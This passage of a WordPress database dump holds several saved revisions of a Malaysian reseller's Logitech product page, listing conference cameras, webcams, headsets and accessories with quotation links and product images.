https://bintara.com.my/wp-content/uploads/2018/12/meetup-conference-cam-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h4>MeetUp</h4><p>All-in-One ConferenceCam with 120Â° field of view and integrated audio, perfect for small conference and huddle rooms</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-connect.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-connect.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-connect-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-connect-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>CONNECT</h3><p>Portable ConferenceCam with Bluetooth speakerphone for the huddle room, home office, and on the go</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-bcc950.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-bcc950.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-bcc950-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-bcc950-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>BCC950</h3><p>Desktop video conferencing solution for private offices, home offices, and most any semi-private space</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ptz-pro-2-camera.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ptz-pro-2-camera.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/ptz-pro-2-camera-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/ptz-pro-2-camera-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>PTZ PRO 2</h3><p>HD 1080p video camera with enhanced pan/tilt and zoom</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"500\" height=\"437\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/rally-camera-e1544499263206.png\" alt=\"\" />											\n		<h4>Rally Camera</h4><p>Premium PTZ camera with Ultra-HD imaging system and automatic camera control</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n		<h2>VC ROOM SOLUTIONS</h2><p>Complete room solutions from Logitech allow participants to quickly kick off and run a video conference meeting.</p><h2 style=\"text-align: center;\">Â </h2><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/smartdock-300x300.png\" alt=\"\" width=\"300\" height=\"300\" /></p><p style=\"text-align: center;\"><strong>SMARTDOCK</strong></p><p style=\"text-align: center;\">[maxbutton id=\"3\"]</p><h2 style=\"text-align: center;\">WEBCAMS</h2><p style=\"text-align: center;\">Designed to work with any VC software, Logitech webcams offer instant collaboration with high-quality HD video.</p><table><tbody><tr><td width=\"200\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/briopictograms-300x300.png\" alt=\"\" width=\"300\" height=\"300\" /></p><p style=\"text-align: center;\"><strong>Logitech Brio</strong></p><p style=\"text-align: center;\">[maxbutton id=\"3\"]</p></td><td width=\"200\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/c930e-webcam-300x300.png\" alt=\"\" width=\"300\" height=\"300\" /></p><p style=\"text-align: center;\"><strong>Logitech C9230e</strong></p><p style=\"text-align: center;\">[maxbutton id=\"3\"]</p></td><td width=\"200\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/c925e-webcam-300x300.png\" alt=\"\" width=\"300\" height=\"300\" /></p><p style=\"text-align: center;\"><strong>Logitech C925e</strong></p><p style=\"text-align: center;\">[maxbutton id=\"3\"]</p></td></tr><tr><td colspan=\"3\" width=\"601\"><p>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/b525-pdp-2017-refresh-300x300.png\" alt=\"\" width=\"300\" height=\"300\" /></p><p style=\"text-align: center;\"><strong>Logitech B525</strong></p><p style=\"text-align: center;\">[maxbutton id=\"3\"]</p></td></tr></tbody></table><h2>Â </h2><h2 style=\"text-align: center;\">HEADSETS</h2><p style=\"text-align: center;\">Stylish and affordable, Logitech headsets are designed for long-lasting comfort to make every call more productive.</p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/h570e-headset-300x300.png\" alt=\"\" width=\"300\" height=\"300\" /></p><p style=\"text-align: center;\"><strong>Logitech H570e Headset</strong></p><p style=\"text-align: center;\">[maxbutton id=\"3\"]</p><h2 style=\"text-align: center;\">VIDEO COLLABORATION ACCESSORIES</h2><table><tbody><tr><td width=\"200\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/smartdock-extender-box.png\" alt=\"\" width=\"393\" height=\"393\" /></p><p style=\"text-align: center;\"><strong>SmartDock Extender Box</strong></p><p style=\"text-align: center;\">[maxbutton id=\"3\"]</p></td><td width=\"200\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/logitech-screen-share.png\" alt=\"\" width=\"393\" height=\"393\" /></p><p style=\"text-align: center;\"><strong>Screen Share</strong></p><p style=\"text-align: center;\">[maxbutton id=\"3\"]</p></td><td width=\"200\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/group-expansion-microphones.png\" alt=\"\" width=\"393\" height=\"393\" /></p><p style=\"text-align: center;\"><strong>Group Expansion Mics</strong></p><p style=\"text-align: center;\">[maxbutton id=\"3\"]</p></td></tr><tr><td width=\"200\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex.png\" alt=\"\" width=\"393\" height=\"393\" /></p><p style=\"text-align: center;\">Logitech SmartDock Flex</p><p style=\"text-align: center;\">[maxbutton id=\"3\"]</p></td><td width=\"200\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/group-15m-extended-cable.png\" alt=\"\" width=\"393\" height=\"393\" /></p><p style=\"text-align: center;\">Group 15m Extended Cable</p><p style=\"text-align: center;\">[maxbutton id=\"3\"]</p></td><td width=\"200\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/group-10m-extended-cable.png\" alt=\"\" width=\"393\" height=\"393\" /></p><p style=\"text-align: center;\">Group 10m Extended Cable</p><p style=\"text-align: center;\">[maxbutton id=\"3\"]</p></td></tr><tr><td colspan=\"3\" width=\"601\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/meetup-expansion-mics-300x300.png\" alt=\"\" width=\"300\" height=\"300\" /></p><p style=\"text-align: center;\">MeetUp Expansion Mic</p><p style=\"text-align: center;\">[maxbutton id=\"3\"]</p></td></tr></tbody></table>','Logitech','','inherit','closed','closed','','16-revision-v1','','','2019-02-14 16:37:16','2019-02-14 08:37:16','',16,'https://bintara.com.my/blog/2019/02/14/16-revision-v1/',0,'revision','',0),(2918,1,'2019-02-14 16:38:13','2019-02-14 08:38:13','<h2>VIDEO CONFERENCINGâ€‹</h2>		\n										<img width=\"300\" height=\"262\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group-300x262.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group-300x262.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group.png 687w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h2>CONFERENCE CAMERAS</h2><p>Bring video collaboration to huddle rooms and large conference rooms with Logitech ConferenceCams.</p>		\n										<img width=\"687\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group.png 687w, https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group-300x262.png 300w\" sizes=\"(max-width: 687px) 100vw, 687px\" />											\n		<h3>GROUP</h3><p>Video conferencing for mid to large-sized meeting rooms</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"687\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/rally-system-b2b-pdp.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/rally-system-b2b-pdp.png 687w, https://bintara.com.my/wp-content/uploads/2018/12/rally-system-b2b-pdp-300x262.png 300w\" sizes=\"(max-width: 687px) 100vw, 687px\" />											\n		<h4>Rally</h4><p>Premium Ultra-HD ConferenceCam system with automatic camera control</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/meetup-conference-cam.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/meetup-conference-cam.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/meetup-conference-cam-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/meetup-conference-cam-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h4>MeetUp</h4><p>All-in-One ConferenceCam with 120Â° field of view and integrated audio, perfect for small conference and huddle rooms</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-connect.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-connect.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-connect-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-connect-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>CONNECT</h3><p>Portable ConferenceCam with Bluetooth speakerphone for the huddle room, home office, and on the go</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-bcc950.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-bcc950.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-bcc950-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-bcc950-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>BCC950</h3><p>Desktop video conferencing solution for private offices, home offices, and most any semi-private space</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ptz-pro-2-camera.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ptz-pro-2-camera.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/ptz-pro-2-camera-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/ptz-pro-2-camera-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>PTZ PRO 2</h3><p>HD 1080p video camera with enhanced pan/tilt and zoom</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"500\" height=\"437\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/rally-camera-e1544499263206.png\" alt=\"\" />											\n		<h4>Rally Camera</h4><p>Premium PTZ camera with Ultra-HD imaging system and automatic camera control</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n		<h2>VC ROOM SOLUTIONS</h2><p>Complete room solutions from Logitech allow participants to quickly kick off and run a video conference meeting.</p><h2 style=\"text-align: center;\">Â </h2><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/smartdock-300x300.png\" alt=\"\" width=\"300\" height=\"300\" /></p><p style=\"text-align: center;\"><strong>SMARTDOCK</strong></p><p style=\"text-align: center;\">[maxbutton id=\"3\"]</p><h2 style=\"text-align: center;\">WEBCAMS</h2><p style=\"text-align: center;\">Designed to work with any VC software, Logitech webcams offer instant collaboration with high-quality HD video.</p><table><tbody><tr><td width=\"200\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/briopictograms-300x300.png\" alt=\"\" width=\"300\" height=\"300\" /></p><p style=\"text-align: center;\"><strong>Logitech Brio</strong></p><p style=\"text-align: center;\">[maxbutton id=\"3\"]</p></td><td width=\"200\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/c930e-webcam-300x300.png\" alt=\"\" width=\"300\" height=\"300\" /></p><p style=\"text-align: center;\"><strong>Logitech C9230e</strong></p><p style=\"text-align: center;\">[maxbutton id=\"3\"]</p></td><td width=\"200\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/c925e-webcam-300x300.png\" alt=\"\" width=\"300\" height=\"300\" /></p><p style=\"text-align: center;\"><strong>Logitech C925e</strong></p><p style=\"text-align: center;\">[maxbutton id=\"3\"]</p></td></tr><tr><td colspan=\"3\" width=\"601\"><p>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/b525-pdp-2017-refresh-300x300.png\" alt=\"\" width=\"300\" height=\"300\" /></p><p style=\"text-align: center;\"><strong>Logitech B525</strong></p><p style=\"text-align: center;\">[maxbutton id=\"3\"]</p></td></tr></tbody></table><h2>Â </h2><h2 style=\"text-align: center;\">HEADSETS</h2><p style=\"text-align: center;\">Stylish and affordable, Logitech headsets are designed for long-lasting comfort to make every call more productive.</p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/h570e-headset-300x300.png\" alt=\"\" width=\"300\" height=\"300\" /></p><p style=\"text-align: center;\"><strong>Logitech H570e Headset</strong></p><p style=\"text-align: center;\">[maxbutton id=\"3\"]</p><h2 style=\"text-align: center;\">VIDEO COLLABORATION ACCESSORIES</h2><table><tbody><tr><td width=\"200\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/smartdock-extender-box.png\" alt=\"\" width=\"393\" height=\"393\" /></p><p style=\"text-align: center;\"><strong>SmartDock Extender Box</strong></p><p style=\"text-align: center;\">[maxbutton id=\"3\"]</p></td><td width=\"200\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/logitech-screen-share.png\" alt=\"\" width=\"393\" height=\"393\" /></p><p style=\"text-align: center;\"><strong>Screen Share</strong></p><p style=\"text-align: center;\">[maxbutton id=\"3\"]</p></td><td width=\"200\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/group-expansion-microphones.png\" alt=\"\" width=\"393\" height=\"393\" /></p><p style=\"text-align: center;\"><strong>Group Expansion Mics</strong></p><p style=\"text-align: center;\">[maxbutton id=\"3\"]</p></td></tr><tr><td width=\"200\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex.png\" alt=\"\" width=\"393\" height=\"393\" /></p><p style=\"text-align: center;\">Logitech SmartDock Flex</p><p style=\"text-align: center;\">[maxbutton id=\"3\"]</p></td><td width=\"200\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/group-15m-extended-cable.png\" alt=\"\" width=\"393\" height=\"393\" /></p><p style=\"text-align: center;\">Group 15m Extended Cable</p><p style=\"text-align: center;\">[maxbutton id=\"3\"]</p></td><td width=\"200\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/group-10m-extended-cable.png\" alt=\"\" width=\"393\" height=\"393\" /></p><p style=\"text-align: center;\">Group 10m Extended Cable</p><p style=\"text-align: center;\">[maxbutton id=\"3\"]</p></td></tr><tr><td colspan=\"3\" width=\"601\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/meetup-expansion-mics-300x300.png\" alt=\"\" width=\"300\" height=\"300\" /></p><p style=\"text-align: center;\">MeetUp Expansion Mic</p><p style=\"text-align: center;\">[maxbutton id=\"3\"]</p></td></tr></tbody></table>','Logitech','','inherit','closed','closed','','16-revision-v1','','','2019-02-14 16:38:13','2019-02-14 08:38:13','',16,'https://bintara.com.my/blog/2019/02/14/16-revision-v1/',0,'revision','',0),(2920,1,'2019-02-14 16:44:18','2019-02-14 08:44:18','<h2>VIDEO CONFERENCINGâ€‹</h2>		\n										<img width=\"300\" height=\"262\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group-300x262.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group-300x262.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group.png 687w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h2>CONFERENCE CAMERAS</h2><p>Bring video collaboration to huddle rooms and large conference rooms with Logitech ConferenceCams.</p>		\n										<img width=\"687\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group.png 687w, https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group-300x262.png 300w\" sizes=\"(max-width: 687px) 100vw, 687px\" />											\n		<h3>GROUP</h3><p>Video conferencing for mid to large-sized meeting rooms</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"687\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/rally-system-b2b-pdp.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/rally-system-b2b-pdp.png 687w, https://bintara.com.my/wp-content/uploads/2018/12/rally-system-b2b-pdp-300x262.png 300w\" sizes=\"(max-width: 687px) 100vw, 687px\" />											\n		<h4>Rally</h4><p>Premium Ultra-HD ConferenceCam system with automatic camera control</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/meetup-conference-cam.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/meetup-conference-cam.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/meetup-conference-cam-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/meetup-conference-cam-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h4>MeetUp</h4><p>All-in-One ConferenceCam with 120Â° field of view and integrated audio, perfect for small conference and huddle rooms</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-connect.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-connect.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-connect-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-connect-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>CONNECT</h3><p>Portable ConferenceCam with Bluetooth speakerphone for the huddle room, home office, and on the go</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-bcc950.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-bcc950.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-bcc950-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-bcc950-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>BCC950</h3><p>Desktop video conferencing solution for private offices, home offices, and most any semi-private space</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ptz-pro-2-camera.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ptz-pro-2-camera.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/ptz-pro-2-camera-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/ptz-pro-2-camera-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>PTZ PRO 2</h3><p>HD 1080p video camera with enhanced pan/tilt and zoom</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"500\" height=\"437\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/rally-camera-e1544499263206.png\" alt=\"\" />											\n		<h4>Rally Camera</h4><p>Premium PTZ camera with Ultra-HD imaging system and automatic camera control</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n		<h2>VC ROOM SOLUTIONS</h2><p>Complete room solutions from Logitech allow participants to quickly kick off and run a video conference meeting.</p>		\n										<img width=\"300\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex-300x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex-300x300.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex.png 393w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h3>SMARTDOCK</h3><p>Secure meeting room console designed for Skype Room Systems</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n		<h2 style=\"text-align: center;\">Â </h2><p style=\"text-align: center;\">Â </p><h2 style=\"text-align: center;\">WEBCAMS</h2><p style=\"text-align: center;\">Designed to work with any VC software, Logitech webcams offer instant collaboration with high-quality HD video.</p><table><tbody><tr><td width=\"200\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/briopictograms-300x300.png\" alt=\"\" width=\"300\" height=\"300\" /></p><p style=\"text-align: center;\"><strong>Logitech Brio</strong></p><p style=\"text-align: center;\">[maxbutton id=\"3\"]</p></td><td width=\"200\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/c930e-webcam-300x300.png\" alt=\"\" width=\"300\" height=\"300\" /></p><p style=\"text-align: center;\"><strong>Logitech C9230e</strong></p><p style=\"text-align: center;\">[maxbutton id=\"3\"]</p></td><td width=\"200\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/c925e-webcam-300x300.png\" alt=\"\" width=\"300\" height=\"300\" /></p><p style=\"text-align: center;\"><strong>Logitech C925e</strong></p><p style=\"text-align: center;\">[maxbutton id=\"3\"]</p></td></tr><tr><td colspan=\"3\" width=\"601\"><p>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/b525-pdp-2017-refresh-300x300.png\" alt=\"\" width=\"300\" height=\"300\" /></p><p style=\"text-align: center;\"><strong>Logitech B525</strong></p><p style=\"text-align: center;\">[maxbutton id=\"3\"]</p></td></tr></tbody></table><h2>Â </h2><h2 style=\"text-align: center;\">HEADSETS</h2><p style=\"text-align: center;\">Stylish and affordable, Logitech headsets are designed for long-lasting comfort to make every call more productive.</p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/h570e-headset-300x300.png\" alt=\"\" width=\"300\" height=\"300\" /></p><p style=\"text-align: center;\"><strong>Logitech H570e Headset</strong></p><p style=\"text-align: center;\">[maxbutton id=\"3\"]</p><h2 style=\"text-align: center;\">VIDEO COLLABORATION ACCESSORIES</h2><table><tbody><tr><td width=\"200\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/smartdock-extender-box.png\" alt=\"\" width=\"393\" height=\"393\" /></p><p style=\"text-align: center;\"><strong>SmartDock Extender Box</strong></p><p style=\"text-align: center;\">[maxbutton id=\"3\"]</p></td><td width=\"200\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/logitech-screen-share.png\" alt=\"\" width=\"393\" height=\"393\" /></p><p style=\"text-align: center;\"><strong>Screen Share</strong></p><p style=\"text-align: center;\">[maxbutton id=\"3\"]</p></td><td width=\"200\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/group-expansion-microphones.png\" alt=\"\" width=\"393\" height=\"393\" /></p><p style=\"text-align: center;\"><strong>Group Expansion Mics</strong></p><p style=\"text-align: center;\">[maxbutton id=\"3\"]</p></td></tr><tr><td width=\"200\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex.png\" alt=\"\" width=\"393\" height=\"393\" /></p><p style=\"text-align: center;\">Logitech SmartDock Flex</p><p style=\"text-align: center;\">[maxbutton id=\"3\"]</p></td><td width=\"200\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/group-15m-extended-cable.png\" alt=\"\" width=\"393\" height=\"393\" /></p><p style=\"text-align: center;\">Group 15m Extended Cable</p><p style=\"text-align: center;\">[maxbutton id=\"3\"]</p></td><td width=\"200\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/group-10m-extended-cable.png\" alt=\"\" width=\"393\" height=\"393\" /></p><p style=\"text-align: center;\">Group 10m Extended Cable</p><p style=\"text-align: center;\">[maxbutton id=\"3\"]</p></td></tr><tr><td colspan=\"3\" width=\"601\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/meetup-expansion-mics-300x300.png\" alt=\"\" width=\"300\" height=\"300\" /></p><p style=\"text-align: center;\">MeetUp Expansion Mic</p><p style=\"text-align: center;\">[maxbutton id=\"3\"]</p></td></tr></tbody></table>','Logitech','','inherit','closed','closed','','16-revision-v1','','','2019-02-14 16:44:18','2019-02-14 08:44:18','',16,'https://bintara.com.my/blog/2019/02/14/16-revision-v1/',0,'revision','',0),(2923,1,'2019-02-15 10:03:52','2019-02-15 02:03:52','<h2>VIDEO CONFERENCINGâ€‹</h2>		\n										<img width=\"300\" height=\"262\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group-300x262.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group-300x262.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group.png 687w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h2>CONFERENCE CAMERAS</h2><p>Bring video collaboration to huddle rooms and large conference rooms with Logitech ConferenceCams.</p>		\n										<img width=\"687\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group.png 687w, https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group-300x262.png 300w\" sizes=\"(max-width: 687px) 100vw, 687px\" />											\n		<h3>GROUP</h3><p>Video conferencing for mid to large-sized meeting rooms</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n			<a href=\"https://bintara.com.my/logitech-group/\" role=\"button\">\n						View\n					</a>\n										<img width=\"687\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/rally-system-b2b-pdp.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/rally-system-b2b-pdp.png 687w, https://bintara.com.my/wp-content/uploads/2018/12/rally-system-b2b-pdp-300x262.png 300w\" sizes=\"(max-width: 687px) 100vw, 687px\" />											\n		<h4>Rally</h4><p>Premium Ultra-HD ConferenceCam system with automatic camera control</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n			<a href=\"https://bintara.com.my/logitech-rally/\" role=\"button\">\n						View\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/meetup-conference-cam.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/meetup-conference-cam.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/meetup-conference-cam-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/meetup-conference-cam-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h4>MeetUp</h4><p>All-in-One ConferenceCam with 120Â° field of view and integrated audio, perfect for small conference and huddle rooms</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-connect.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-connect.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-connect-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-connect-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>CONNECT</h3><p>Portable ConferenceCam with Bluetooth speakerphone for the huddle room, home office, and on the go</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-bcc950.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-bcc950.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-bcc950-150x150.png 150w, 